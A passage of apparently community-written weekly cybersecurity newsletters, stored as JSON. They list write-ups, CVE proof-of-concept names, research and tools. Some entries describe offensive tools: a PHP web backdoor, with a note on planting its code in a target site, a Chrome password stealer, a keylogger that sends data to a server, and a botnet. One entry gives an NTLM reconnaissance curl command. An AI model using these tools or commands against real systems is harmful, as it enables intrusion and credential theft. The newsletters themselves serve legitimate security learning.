Zoom (for macOS)](https://speakerdeck.com/patrickwardle/youre-muted-rooted)\n- [Google Cloud Shell - Command Injection](https://bugra.ninja/posts/cloudshell-command-injection/)\n- [Discord Desktop - Remote Code Execution](https://blog.electrovolt.io/posts/discord-rce/)\n- [Liferay revisited: A tale of 20000$](https://vsrc.vng.com.vn/blog/liferay-revisited-a-tale-of-20k/)\n- [Ever Hacked Nginx? Well, now you can by reading this article by Manas Harsh.](https://infosecwriteups.com/hacking-nginx-best-ways-7c576cc17ccc)\n- [Find out how Sivanesh Ashok and his friend were able to steal Google Drive OAuth tokens from Dropbox.](https://blog.stazot.com/stealing-google-drive-oauth-tokens-from-dropbox/)\n- [Read about SharePoint API misconfigurations in this article by Ujjaval Malhotra.](https://medium.com/@ujmalhotra95/tales-of-sharepoint-api-misconfigurations-11073ad384fd)\n- [Bypassed Cloudflare’s Web Application Firewall (WAF)](https://medium.com/@the_harvester/bypassed-cloudflares-web-application-firewall-waf-44da57f3a1d3)\n- [How I learned that some bugs are truly rare, or Salesforce bug hunting to a critical bug](https://infosecwriteups.com/salesforce-bug-hunting-to-critical-bug-b5da44789d3)\n- [Writeup on several major vulnerabilities in CentOS Web Panel](https://www.immersivelabs.com/blog/we-discovered-major-vulnerabilities-in-control-web-panel-heres-how-we-found-them/)\n- [From Shodan to RCE: That one time I hacked a Fortune 500 company.](https://systemweakness.com/rooting-jenkins-remote-code-execution-on-a-live-bug-bounty-target-fc2c12d89a2e)\n- [Business Logic Vulnerability via IDOR](https://sagarsajeev.medium.com/business-logic-vulnerability-via-idor-6d510f1caea9)\n- [Internal Bug Bounties & The Importance of Timing](https://medium.com/@tankSOC/internal-bug-bountys-the-importance-of-timing-f9aee5afa9d8)\n- [Top 5 Security Issues with Cookies](https://0xshakhawat.medium.com/top-5-security-issue-with-cookies-54c18ae71f98)\n- [My pentest log by hcibo 1-22](https://hcibo.medium.com/)\n- [Bug bounty resources - Notion Notes](https://jeweled-lathe-d5e.notion.site/Resources-For-Bug-Bounty-14abca4df5be40838df4689afb384388)\n\n\n### Research Article/Whitepaper & Statistics Reports\n- Quarterly Adversarial Threat Report Q2 2022 - https://drive.google.com/file/d/1VaezIySG295MxX0njgb-EZm5oRvueIsk/view?usp=sharing\n- The DFIR Report: 2021 real intrusions recap - https://thedfirreport.com/2022/03/07/2021-year-in-review/\n- Code Review Checklist - https://drive.google.com/file/d/183yB8v-TivlrEQ3oe-p953J45mh1R2DG/view?usp=sharing\n- How Leaked Twitter API Keys Can be Used to Build a Bot Army - https://drive.google.com/file/d/19qUBeq7jGaxP1kWBGaH1XPA6ZbsCpisAG/view?usp=sharing\n- Detecting DNS implants: Old kitten, new tricks – A Saitama Case Study - https://research.nccgroup.com/2022/08/11/detecting-dns-implants-old-kitten-new-tricks-a-saitama-case-study/\n- Security Implications of URL Parsing Differentials - https://blog.sonarsource.com/security-implications-of-url-parsing-differentials/\n- PostgreSQL vulnerabilities in cloud services - https://www.wiz.io/blog/the-cloud-has-an-isolation-problem-postgresql-vulnerabilities\n- Enhancing Subdomain Enumeration - ENTs and NOERROR - https://www.securesystems.de/blog/enhancing-subdomain-enumeration-ents-and-noerror/\n- How Cisco got hacked - insights on what the attackers did - https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html\n- The Cisco Hack - Learning from the Cisco Hack, Trail of Evidence Found in Logs - https://trunc.org/learning/cisco-hack-tracks-left-in-the-logs\n- Security Best Practices in PHP - https://sweetcode.io/security-best-practices-in-php/\n- How useful is the CVSS score in CVE triage? The CVSS who cried wolf: a check against vulnerability exploitation data - https://inthewild.io/blog/how-useful-is-cvss-score-in-CVE-triage\n- Security Guide for Startups: How to think about security while moving quickly | LunaSec - https://www.lunasec.io/docs/blog/security-guide-for-startups/\n- Germany to mandate minimum security standards for web browsers in government - https://portswigger.net/daily-swig/germany-to-mandate-minimum-security-standards-for-web-browsers-in-government\n- Continued in: Security and Researchers: Pentesting, Red, Blue, Threat Intelligence, SOC, Ransomware etc.\n\n### Twitter thread\n- Best SSRF 2022 - https://twitter.com/0dayCTF/status/1556279777455386627\n- Check out this thread to find out how @0xmahmoudJo0 was able to access a target’s admin panel - https://twitter.com/0xmahmoudJo0/status/1533402992212430849\n- @0xConda's first month doing bug bounty, and getting to the top 100 of the all-time leaderboard on Intigriti - https://twitter.com/0xConda/status/1534868739652476928?t=g8zCgwd5nnMiPOcstgOC9A&s=19\n- @_zwink once again does what he’s extremely good at (find out by clicking here) - https://twitter.com/_zwink/status/1534605203441188865?t=O8XajIEZc6zWBZJDqMmx_Q&s=19\n\n\n### Tools, RATs and Ransomware\n- List of Black Hat Arsenal tools (since its inception in 2011) - https://github.com/toolswatch/blackhat-arsenal-tools\n- BlueHound is an open-source tool that helps blue teams pinpoint the security issues that actually matter - https://github.com/zeronetworks/BlueHound\n- Codewarrior - open-source SAST - https://github.com/CoolerVoid/codewarrior\n- Packj: Flags malicious/risky open-source packages - https://github.com/ossillate-inc/packj\n- [DefectDojo : DevSecOps](https://www.defectdojo.com/) is a security orchestration and vulnerability management platform - https://github.com/DefectDojo/django-DefectDojo\n- ocsf-schema : Open Cybersecurity Schema Framework - https://github.com/ocsf/ocsf-schema\n- WebRecon : A collection of pentesting tools that perform vulnerability scans of websites - https://github.com/flashnuke/WebRecon\n- Kharma: A new grammar-based fuzzer - https://github.com/Rog3rSm1th/kharma\n- Agnee : Find sensitive information using dorks from different search engines - https://github.com/R0X4R/Agnee\n- Gorilla: tool for generating wordlists or extending an existing one using mutations - https://github.com/d4rckh/gorilla\n- An automated mass network vulnerability scanner and recon tool - https://github.com/whitehatsoumya/Nutoscan\n- JF⚡can - Super fast port scanning & service discovery using Masscan and Nmap. Scan large networks with Masscan and use Nmap's scripting abilities to discover information about services. Generates a report. - https://github.com/nullt3r/jfscan\n- AWSGoat is a vulnerable-by-design infrastructure on AWS featuring the latest released OWASP Top 10 web application security risks (2021) and other misconfigured AWS services - https://github.com/ine-labs/AWSGoat\n- HTTP Request Smuggler (not to be confused with Burp Suite HTTP Smuggler (https://github.com/nccgroup/BurpSuiteHTTPSmuggler), which uses similar techniques but is focused exclusively on bypassing WAFs) - https://github.com/portswigger/http-request-smuggler\n- zathura - a highly customizable and functional document viewer - https://github.com/pwmt/zathura\n- DotDumper : An automatic unpacker and logger for DotNet Framework targeting files! This tool was unveiled at Black Hat USA 2022 (https://www.blackhat.com/us-22/arsenal/schedule/index.html#dotdumper-automatically-unpacking-dotnet-based-malware-27846). - https://github.com/advanced-threat-research/DotDumper\n- ParamChanger : tool allowing you to replace the parameters of a list of URLs with a payload entered as an argument - https://github.com/mathis2001/ParamChanger\n- Aline : OSINT tool that simply downloads files of a certain type, located on a certain domain and indexed by Google - https://github.com/ferreiraklet/Aline\n- Blackbird: An OSINT tool to search for accounts by username in social networks - https://github.com/p1ngul1n0/blackbird\n- Burp2Malleable turns HTTP requests from Burp Suite into Cobalt Strike Malleable C2 profiles - https://github.com/CodeXTF2/Burp2Malleable\n- chrome_password : Get username & password from Chrome (Windows only for now) - https://github.com/justjavac/chrome_password.js\n- BadBlood by Secframe fills a Microsoft Active Directory domain with a structure and thousands of objects - https://github.com/davidprowe/BadBlood\n- python-keylogger : Simple Python keylogger with pynput, sending data to a server - https://github.com/davidbombal/python-keylogger\n\n### Security and Researchers: Pentesting, Red, Blue, Threat Intelligence, SOC, Ransomware etc.\n- WiFi Standard 802.11ac Packet Analysis - https://tbhaxor.com/wifi-standard-80211ac-packet-analysis/\n- What Happened to Lapsus$ - https://coderoasis.com/what-happened-to-lapsus/\n- Starlink Successfully Hacked Using $25 Modchip - https://threatpost.com/starlink-hack/180389/\n- How hackers hack Starlink - https://github.com/KULeuven-COSIC/Starlink-FI\n- Maui Ransomware - https://securityaffairs.co/wordpress/134195/malware/maui-ransomware-andariel-apt.html\n- Technical analysis of Industrial Spy ransomware - https://www.zscaler.com/blogs/security-research/technical-analysis-industrial-spy-ransomware\n- How to securely confine the zathura application to a SELinux domain - https://blog.esp0x31.io/zathura-selinux-confined/\n- iOS Privacy: Instagram and Facebook can track anything you do on any website in their in-app browser - https://krausefx.com/blog/ios-privacy-instagram-and-facebook-can-track-anything-you-do-on-any-website-in-their-in-app-browser?s=09\n- The quantum state of Linux kernel garbage collection CVE-2021-0920 (Part I) - https://googleprojectzero.blogspot.com/2022/08/the-quantum-state-of-linux-kernel.html\n- [Dancing on the architecture of VMware Workspace ONE Access](https://petrusviet.medium.com/dancing-on-the-architecture-of-vmware-workspace-one-access-eng-ad592ae1b6dd)\n- Analysis of Dark Web service offerings, LNK delivery patterns & detection opportunities, and more - https://opalsec.substack.com/p/soc-goulash-weekend-wrap-up-285\n- Advisory: Cisco Small Business RV Series Routers Web Filter Database Update Command Injection Vulnerability - https://onekey.com/blog/advisory-cisco-small-business-rv-series-routers-web-filter-database-update-command-injection-vulnerability/\n- WiFi Traffic Analysis in Wireshark - https://tbhaxor.com/wifi-traffic-analysis-in-wireshark/\n- From Shared Dash to Root Bash :: Pre-Authenticated RCE in VMware vRealize Operations Manager - https://srcincite.io/blog/2022/08/09/from-shared-dash-to-root-bash-pre-authenticated-rce-in-vmware-vrealize-operations-manager.html\n- IAM Whoever I Say IAM :: Infiltrating VMware Workspace ONE Access Using a 0-Click Exploit - https://srcincite.io/blog/2022/08/11/i-am-whoever-i-say-i-am-infiltrating-vmware-workspace-one-access-using-a-0-click-exploit.html\n- BumbleBee (malware loader) Roasts Its Way to Domain Admin - https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/\n- Concealed code execution: Techniques and detection used by APTs to execute code, mostly on Windows systems - https://www.huntandhackett.com/blog/concealed-code-execution-techniques-and-detection\n- HijackLibs: an open-source, community-driven project tracking DLL hijacking opportunities in Windows - https://hijacklibs.net/\n- LibAFL: A Framework to Build Modular and Reusable Fuzzers - https://www.s3.eurecom.fr/docs/ccs22_fioraldi.pdf\n- capa v4: casting a wider .NET - https://www.mandiant.com/resources/capa-v4-casting-wider-net\n- ATT&CK + D3FEND = D.E.A.T.H - https://fourcore.io/blogs/mitre-attack-mitre-defend-detection-engineering-threat-hunting\n\n### Red Team\n- Useful red team GitHub links\n  - https://github.com/A0RX/Red-Blueteam-party\n  - https://github.com/MantisSTS/RedTeamTools\n  - https://github.com/idchoppers/redTeaming\n  - https://github.com/irredteam/irredteam.github.io\n  - https://github.com/0xMrNiko/Awesome-Red-Teaming\n  - https://github.com/J0hnbX/RedTeam-Resources\n  - https://github.com/dmcxblue/dmcxblue.github.io\n\n### Volunteer Opportunities:\n\nIf you want to get involved in making the **Weekly Cybersecurity Update** better but aren't sure how, contact \"@Attr1b\" on Telegram or mail us at \"resethackerofficial@gmail.com\" and briefly explain how you plan to improve it.\n\n### [SOURCE for Weekly Infosec Update:](https://github.com/RESETHACKER-COMMUNITY/Community-Contributers/blob/main/StayUptoDate.md)\n"
  },
  {
    "path": "ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_03.md",
    "content": " #### Hey Hackers, I hope you’ve been doing well! \n Here are the Agenda for \"Weekly infosec Update\" 03 (16th - 22nd Aug 2022): \n\n<img src=\"https://user-images.githubusercontent.com/25515871/187044997-08eca61a-0290-47e7-a2f6-8196c385b0c9.png\" width=\"550\" height=\"800\">   \n\n#### Remember to support us by contributing to repository and giving a Star. \n#### Supported By - [ResetHacker Community](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty) and BugBountyTips.Tech.\n- Contributors : - Vikram, Paul miller, Tarang Parmar\n\nLet's start the Week recap,\n\n### Hiring & Free course**\n\n- [Hiring/Jobs Opening week 04 : Aug 2022](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/Jobs.md#Weekly-Cybersecurity-Hiring-Aug-2022)\n- [Interview Questions](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/InterviewQA.md)\n\n### Events, Talks & Webinars**\n\n   - DEFCON workshop : Hacking APIs Presentation notes from Corey Ball’s - https://sway.office.com/HVrL2AXUlWGNDHqy\n   - Black Hat talk : Victoria Ontiveros and Tarah Wheeler gave a Talk - [How to Stand Up a Major Cyber Incident Investigations Board and how a process could be applied to cyber incident investigations.](https://github.com/tarahmarie/investigations/blob/main/playbook.md)\n  - [Black Hat talk by NCC Group’s Iain Smart and Viktor Gazdag  where he discuss RCE-as-a-Service: Lessons Learned from 5 Years of Real-World CI/CD Pipeline Compromise abstract ](https://www.blackhat.com/us-22/briefings/schedule/index.html#rce-as-a-service-lessons-learned-from--years-of-real-world-cicd-pipeline-compromise-27541)\n  - [Black Hat USA 2022 : Controlling the Source: Abusing Source Code Management Systems](https://securityintelligence.com/posts/abusing-source-code-management-systems/)\n  IBM X-Force Red’s Brett Hawkins on material he presented at Black Hat USA 2022 (whitepaper). 
He discusses attack scenarios for GitHub Enterprise, GitLab Enterprise, and Bitbucket, including reconnaissance, manipulation of user roles, repository takeover, pivoting to other DevOps systems, user impersonation, and maintaining persistent access. Brett also released a tool: [SCMKit - Source Code Management Attack Toolkit ](https://github.com/xforcered/SCMKit).\n\n  - [Red Teaming TTPs // Developing a POC for CVE-2022-26923 with Powershell and CommandoVM](https://youtu.be/z86tfhMU_vU)   \n  - [Snyff Talks About Hacking, Learning and Creating PentesterLab!](https://www.youtube.com/watch?v=XaLA5yqvKN8)\n  - [Portable DIY Raspberry Pi Thermal Camera + Fingerprint Decoder Algorithm Teaser](https://www.youtube.com/watch?v=ZDRz1PYWp94)\n\n### Cve's POC and analysis**\n\n  *CVE's Week 02 -> 9 - 16 Aug 2022* \n  - https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/CVE's/Readme.md\n  \n      - CVE-2022-1802 POC Exploit, CVE-2022-21881 POC , cve-2022-37393 Analysis, CVE-2022-36966, 1day to 0day(CVE-2022-30024) on TP-Link TL-WR841N, CVE-2020-6369 Patch bypass, CVE-2022-35742 Analysis (Window outlook), CVE-2020-6369 Patch bypass and CVE-2022-29805 Analysis. 
\n      - Nuclei Zimbra: Release of CVE-2022-37042 Zimbra Authentication Bypass Causing RCE Non-Destructive Vulnerability Detection Template.\n      - Sysax-multi-server-ssh-username-exploit\n      - K8tools - K8 tool collection.\n\n### Vulenrabilty/bugs Reoprts, vulnerability Writeups and Anlalysis**\n\n   *Hackerone/Bugcrowd Report Segment:*\n  \n   -  [$4,617.00 Delimiter injection in GitHub Actions \"core.exportVariable\" function](https://hackerone.com/reports/1625652)\n   -  [Passing a large list of amounts to the get_output_distribution call crashes a remote node, after maybe 90 seconds of keeping it busy.](https://hackerone.com/reports/1379707)\n   -  [$6200 Critical Local File Read in Electron Desktop App](https://bugcrowd.com/disclosures/f7ce8504-0152-483b-bbf3-fb9b759f9f89/critical-local-file-read-in-electron-desktop-app)\n\n \n  *Bugs Analysis and Writeups segment:* \n   -  [$100,000 Attacking the Mozilla Firefox Renderer : Browser bug, RCE (Part 1)](https://www.zerodayinitiative.com/blog/2022/8/17/but-you-told-me-you-were-safe-attacking-the-mozilla-firefox-renderer-part-1)\n   -  [$30,000 Reward from Microsoft : Let's Dance in the Cache - Destabilizing Hash Table on Microsoft IIS! 
(DoS, Web cache poisoning, Authentication bypass)](https://blog.orange.tw/2022/08/lets-dance-in-the-cache-destabilizing-hash-table-on-microsoft-iis.html)\n   - [Account takeover worth $1000 using misconfigured 2FA and OAuth.](https://infosecwriteups.com/account-takeover-worth-1000-611452063cf)\n   - [Vulnerability in the enforcement of group permissions in Linux containers (Docker, Kubernetes, etc.)](https://www.benthamsgaze.org/2022/08/22/vulnerability-in-linux-containers-investigation-and-mitigation/)\n   - [Ridiculous vulnerability disclosure process with CrowdStrike Falcon Sensor.](https://www.modzero.com/modlog/archives/2022/08/22/ridiculous_vulnerability_disclosure_process_with_crowdstrike_falcon_sensor/index.html)\n   - [Hacking BeReal - A practical lesson on “Man in the Middle” attacks](https://blog.oscars.dev/posts/hacking_bereal_with_man_in_the_middle)\n   - [About Jenkins tokens](https://www.errno.fr/JenkinsTokens.html)\n\n\n### Twitter thread**\n\n  - [Cybersecurity Jobs at Twitter](https://twitter.com/LeaKissner/status/1560352231047569408?s=20&t=vvNxiqtIqd5KP1Vf7WlSVA)\n  - [InsiderPHP approch on H1-702 targets where she live tweeted her process 👇](https://twitter.com/insiderphd/status/1552574912719618048?s=21&t=fct3KWsYeXMAGM3FgTIEaw)\n  - [Signal says that it's one of the 125 customers impacted in the Twilio breach from earlier this month:](https://support.signal.org/hc/en-us/articles/8BQAzQwVETtFWGmAFZjAwNSYA7M4EczfocpPa2kZ6AiC1tVQuAhJTRjLG5Nkk4QqFWHxiKBdi6RuUFjC5zMhvhUyK7tatMA/status/1559221383107854336?s=21)\n  - [See what JavaScript commands are injected into the program through the browser.👀 Tik Tok, when opening any website in its program, injects its own code that can monitor all keys that are typed, including passwords, and all other types.](https://twitter.com/KrauseFx/status/1560370732705742848?s=20&t=D6Wi--gvYqSvFAzulJ8qRw)\n  \n### Research Article/Whitepaper & Statistics Reports**\n  \n  - BlackHat : NTLM relay is dead and living in AAD 
- https://i.blackhat.com/USA-22/Wednesday/US-22-Rubin-AAD-Joined-Machines-New-Lateral-Movement.pdf\n  - Code Review Checklist - https://drive.google.com/file/d/183yB8v-TivlrEQ3oe-p953J45mh1R2DG/view?usp=sharing\n  - A Lightweight Approach To Implement Secure Software Development LifeCycle (Secure SDLC) - https://www.anshumanbhartiya.com/posts/secure-sdlc\n  - [Hacking Together an ASM Platform Using ProjectDiscovery Tools](https://blog.projectdiscovery.io/asm-platform-using-projectdiscovery-tools/)\n  - [Building Your Own Historical DNS Solution with DNSx](https://blog.projectdiscovery.io/building-your-own-historical-dns-solution-with-dnsx/)\n  - [Enhanced With AWS san Intigration. ](https://blog.rewanthtammana.com/trivy-enhanced-with-aws-scan-integration)\n  \n  - Continue on : ### Secuirty and Researchers: Pentesting, Red, blue, Threat inteligence, SOC, Ransomeware etc**\n\n\n### [Tools: OSINT, Pentesting, Blue/Red team, Rat, Ransomware etc**]\n[TOOLS WE'RE ADDING THIS WEEK:](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/Tools/Readme.md)\n\n   - SAAS/PASS/Recon/Exploit Web :\n        \n          - Lazyparam - A simple automation tool to detect LFI, RCE, and SSTI vulnerability\n          - FindFrontableDomains - Search for potential frontable domains. FindFrontableDomains Tool is based on information found here: https://www.bamsoftware.com/papers/fronting/\n          - goSqlite_gorm - golang,Penetration, Attack, Auxiliary Tool, tnb = tree new bee\n          - Serein_Linux - 【Lazy Artifact】A graphical tool that collects urls in batches, and performs various nday detections on the collected urls in batches. It can be used for src mining, cnvd mining, 0day exploitation, building your own arsenal and other scenarios.\n          - HiPHP - BackDoor to control php-based sites. : A BackDoor to control php-based sites hiphp can be controlled by sending commands, files, and tokens to the site using the http/https protocol. 
After copying the HIPHP_HOLE_CODE and placing it in any php file on the target website, you will have permissions to enter it, read all files, delete and even upload new files to it. Also, this back door is password protected.\n          - SCMKit v1 - Source Code Management Attack Toolkit can be use to attack SCM systems.\n\n  - *Cloud Security :*\n        \n          - Assisted Log Enabler for AWS - Find AWS resources that are not logging, and turn them on.\n\n  - *Blue Team Tools :*\n        \n        - BlueHound - open-source tool that helps blue teams pinpoint the security issues that actually matter.\n        - Matos : An open-source cloud security tool for analyzing multi-cloud infrastructure security.\n        - Siembol : An open-source, real-time Security Information & Event Management tool based on big data technologies, providing a scalable, advanced security analytics framework. Siembol provides a scalable, advanced security analytics framework based on open-source big data technologies. Siembol normalizes, enriches, and alerts on data from various sources, which allows security teams to respond to attacks before they become incidents. 
\n        - Sauron is a minimalistic cross-platform malware scanner with non-blocking realtime filesystem monitoring using YARA rules, written in Rust.\n  - *Malware Analysis :* \n       \n       - PortEx - Java library for static malware analysis of Portable Executable files\n  \n  - *OSINT Tools :*\n        \n        - Yagooglesearch (Yet Another Google Search #python library) : \"Simulates real human Google search behavior to prevent rate limiting by Google and if HTTP 429 blocked by Google, logic to back off and continue trying\" (c)\n        - PyTrends : Simple #python library for automatically collecting data from Google Trends. For example, you can find out what queries users enter with a certain keyword (including historical and regional data).\n        - Email-header-analyzer\n     \n     - NTLM Auth Trick : Determining the AD domain name via NTLM Auth\n\n          If nmap (http-ntlm-info) is unable to determine the FQDN of an Active Directory domain via OWA, for example due to Citrix NetScaler or other SSO solutions, do it manually!\n\n          1. curl -I -k -X POST -H 'Authorization: NTLM TlRMTVNTUAABAAAAB4IIogAAAAAAAAAAAAAAAAAAAAAKANc6AAAADw==' -H 'Content-Length: 0' https://autodiscover.exmaple.com/ews\n          2. echo 'TlRMTVNTUAACAAAADAAMAD...' | python2 ./ntlmdecoder.py\n          https://gist.github.com/aseering/829a2270b72345a1dc42\n\n### Security and Researchers: Pentesting, Red, Blue, Threat Intelligence, SOC, Ransomware etc**\n\n- *Misc :*\n    - Spammers use Google Translate to bypass Domain-Blacklists - https://certitude.consulting/blog/en/bypass-phishing-detections-with-google-translate-2/\n    - BlackHat: Return to Sender - Detecting Kernel Exploits with eBPF - https://i.blackhat.com/USA-22/Wednesday/US-22-Fournier-Return-To-Sender.pdf\n    - Search results are getting restricted after certain pages. 
- https://youtu.be/8O_NvPpbsbw\n    - New USB Rubber Ducky runs its own structured programming language - https://www.theverge.com/23308394/usb-rubber-ducky-review-hack5-defcon-duckyscript\n    - DEFCON: How US Teen Rickrolled His High School District - https://www.infosecurity-magazine.com/news/defcon-how-us-teen-rickrolled/\n    - malwareDev: Many applications appear to rely on Environment Variables such as %SYSTEMROOT% to load DLLs from protected locations.  By changing these variables on process level, it is possible to let a legitimate program load arbitrary DLLs. - https://github.com/wietze/windows-dll-env-hijacking\n         - Research: https://www.wietzebeukema.nl/blog/save-the-environment-variables\n   - Pitraix Botnet - Modern P2P Self-Modifying Botnet Cross-Platform Over TOR - https://github.com/ThrillQuks/Pitraix\n  - Sysmon 14.0 : File block Execution - https://medium.com/@olafhartong/sysmon-14-0-fileblockexecutable-13d7ba3dff3e\n  - Detection Engineering with MITRE Top Techniques & Atomic Red Team - FourCore - https://fourcore.io/blogs/detection-engineering-with-mitre-engenuity-atomic-red-team\n  - Splunk Security Essentials Docs - https://docs.splunksecurityessentials.com/content-detail/\n  - Introducing the new AWS Serverless Snippets Collection - https://aws.amazon.com/blogs/compute/introducing-the-new-aws-serverless-snippets-collection/\n\n- *Blue/Purple Team :*\n    - 💙Blue Team Cheatsheets - https://github.com/chrisjd20\n    - [Open Cybersecurity Schema Framework](https://github.com/ocsf)\nA proposed standard (whitepaper) for sharing security information. By standardizing alerts and logs from various tools, data scientists and analysts can work with a common language for threat detection and investigation. 
Companies involved include: Amazon, Splunk, IBM, Crowdstrike, Rapid7, Palo Alto, and Cloudflare.\n    - [Introducing Threatest, a Go framework for end-to-end testing of threat detection rules](https://securitylabs.datadoghq.com/articles/threatest-end-to-end-testing-threat-detection/)\nThreatest allows you to define scenarios where you detonate an attack technique (over SSH or using Stratus Red Team), then assert that an alert was produced on a third-party platform.\n    - [Applied Purple Teaming - Infrastructure, Threat Optics, and Continuous Improvement](https://github.com/DefensiveOrigins/APT06202001/tree/master/Lab-Build-PreReq)\n\n### BlackHat Hacker News:\n  - AWAE OSWE Exam Writeup July 2022 has been leaked.(Source : Unknown)\n  - 🔴 The Clop ransomware group claimed that it was able to break into Thames Water's industrial control systems and steal 5 terabytes of data, but did not encrypt any data, and although it could change the chemical percentage of water and affect 15 million British people, this It did not work and this company informed about this vulnerability. But the company has denied this claim.\n\n    Further, this ransomware group has published part of the data to prove that by checking it, they realized that this group did not hack Thames Water and in fact they hacked South Staffordshire Water, which of course this company confirmed this hack. (Part of the data is the username and password that belong to this company, i.e. South-Staffs-Water.co.uk@*)\n\n    Based on this, there are two possibilities, either this group's goal is to misidentify or they want to extort money from a big company with the information of this small company.\n\n    Given that Britain is in a drought period and has implemented water rationing policies, the choice of such targets on the part of the attackers can be done to exert pressure to pay the ransom, which is conceivable.\n\n\n### How to get involve in Contribution? 
:\n\n    If you want to get involved in making **Weekly Cybersecurity Update** a better, but aren't sure how.\n    CONTACT \"@Attr1b\" on Telegram or mail us to \"resethackerofficial@gmail.com\" \n    \n    Please write a reason, How do you plan to improve it?\n    \n### [SOURCE for Weekly infosec Update:](https://github.com/RESETHACKER-COMMUNITY/Community-Contributers/blob/main/StayUptoDate.md)\n\n### Wrapping Up\n\n  Have questions, Suggestions, or feedback? Just reply directly to mail, I'd love to hear from you.\n\n  If you find this newsletter useful and know other people who would too, I'd really appreciate if you'd forward it to them 🙏\n\n  Thanks for reading!\n  <p align=\"center\"> <img src=\"https://komarev.com/ghpvc/?username=RESETHACKER-COMMUNITY&label=Profile%20views&color=ce9927&style=flat\" alt=\"RESETHACKER-COMMUNITY\" /> </p>\n"
  },
  {
    "path": "ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_04.md",
    "content": " #### Hey Hackers, I hope you’ve been doing well! \n Here are the Agenda for \"Weekly infosec Update\" 04 (23rd - 30th Aug 2022) \n \n![](https://img.shields.io/github/issues/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![](https://img.shields.io/github/forks/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![](https://img.shields.io/github/stars/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![](https://img.shields.io/github/last-commit/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n<p align=\"\"> <img src=\"https://komarev.com/ghpvc/?username=RESETHACKER-COMMUNITY&label=Profile%20views&color=ce9927&style=flat\" alt=\"Pentesting-Bugbounty//ResetCybersecuirty/\" /> </p>\n\n<img src=\"https://user-images.githubusercontent.com/25515871/187194321-176cb509-f25c-4e5a-9077-0151b5e88274.png\" width=\"650\" height=\"825\">   \n\n---\n\n#### We started working on \"Weekly Infosec Update\" because It's very time consuming to monitor the InfoSec Community on twitter, telegram, reddit. discord and visiting security website every day. \nWe had no idea we’d end up releasing \"Weekly Infosec Update\" every Wednesday. Huge thanks to our awesome [Community Leader to contribution and giving back to community](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/SupportedBy/Team%26Contributors.md) and thankyou for being the part of team.\n\nContributors : - Good Resources Share, Paul miller, [Tarang Parmar](https://github.com/TarangParmar), [Tuhin Bose](https://github.com/tuhin1729), Vikram and Alexandre ZANNI ([@noraj](https://github.com/noraj) Github Moderator).\n\n---\n\n### Let's start the Week recap, and my apology for So much Info. We're finding a way to make it shorter.\n\n### 🏛️🏛️🏛️ HIRING, WORKSHOP & TRAINNING 🏛️🏛️🏛️\n\n**Here we talk about and share resources related to Jobs, Ongoing Workshop and free trainning offered by organization, community and leader.**\n\n1. 
Let's Talk about [Internship/Job Opening in Aug 2022](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/Jobs.md#Weekly-Cybersecurity-Hiring-Aug-2022).\n\n2. Here We have collected [Interview Questions asked by organization while Hiring](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/InterviewQA.md).\n\n3. Free SANS Workshop: [Building an Azure Pentest Lab for Red Teams](https://www.sans.org/webcasts/sans-workshop-building-azure-pentest-lab-red-teams/)\n\n### 📆📆📆 EVENTS, TALKS & WEBINAR 📆📆📆\n\n**This Week Defcon, BlackHat and Liran Tal talk from JSDayCAN22 was mainly trending in infosec community so We have filtered important Talk, Slides, Tools, Weekly Podcast, Youtube Videos and resources releted to Events, Talks & Webinars.**\n\n - In case you're still strugling with finding [Blackhat 2022 all the slides](https://drive.google.com/drive/mobile/folders/1KHx2rKUEdb53flGUN0mFHRdSdB5PUT4B?fbclid=IwAR1C2Fk3XDPU-ky-4B57ZmKtEKgjB6Yg-9m2c6MTxyJd779yPV7MCCHCvWo&fs=e&s=c). This drive have it all. Enjoy :)\n\n - In BlackHat USA 2022, markakd talked about [DirtyCred - A New Exploitation Method! No Pipe but as Nasty as Dirty Pipe](https://github.com/markakd/DirtyCred)\n\n - This article is the “text notes” version of @spaceraccoon talk at DEF CON 30 Cloud Village. [Exploiting Improper Validation of Amazon Simple Notification Service SigningCertUrl](https://spaceraccoon.dev/exploiting-improper-validation-amazon-simple-notification-service/) - The talk was not recorded so this is the only public version of it.\n\n - [How React Applications Get Hacked in the Real-World – Liran Tal](https://youtu.be/f16lELnFTNI) : [Slide](https://slides-react-security-lightning-talk-2022.vercel.app/1) -> By using React we are completely safe when it comes to sanitizing user input right? 
Liran scarily points out that in fact although React does cover most cases for us, dynamic href attributes are not encoded so can be susceptible to XSS attacks 😱. It’s therefore important that if we are to expose some user input via href we should always prefix the protocol (https://) and use relative paths!\n\n---\n\n### 🪲🪲🪲 CVE : poc exploit and cve analysis 🪲🪲🪲\n\n#### Week -> [23rd - 30th August 2022](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/CVE's/Readme.md)\n\n**There are tens of thousands of vulnerabilities disclosed each year. Only a handful of them will ever be exploited So In this Section, Every Week we filter out  [CVE poc exploit and analysis writeups that have Higher Severity](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/CVE's/Readme.md).** If you don't play with CVE then please skip this Section.\n  \n      CVE POC exploit : CVE-2022-32250, CVE-2022-37042, CVE-2022-38766, CVE-2022-23779, CVE-2022-32250-Linux-Kernel-LPE, \n                        CVE-2022-22715 , CVE-2022-37153, CVE-2022-2884, CVE-2022-2586 and CVE-2022-LPE-UAF.\n      \n      CVE Analysis :    CVE-2022-20233, 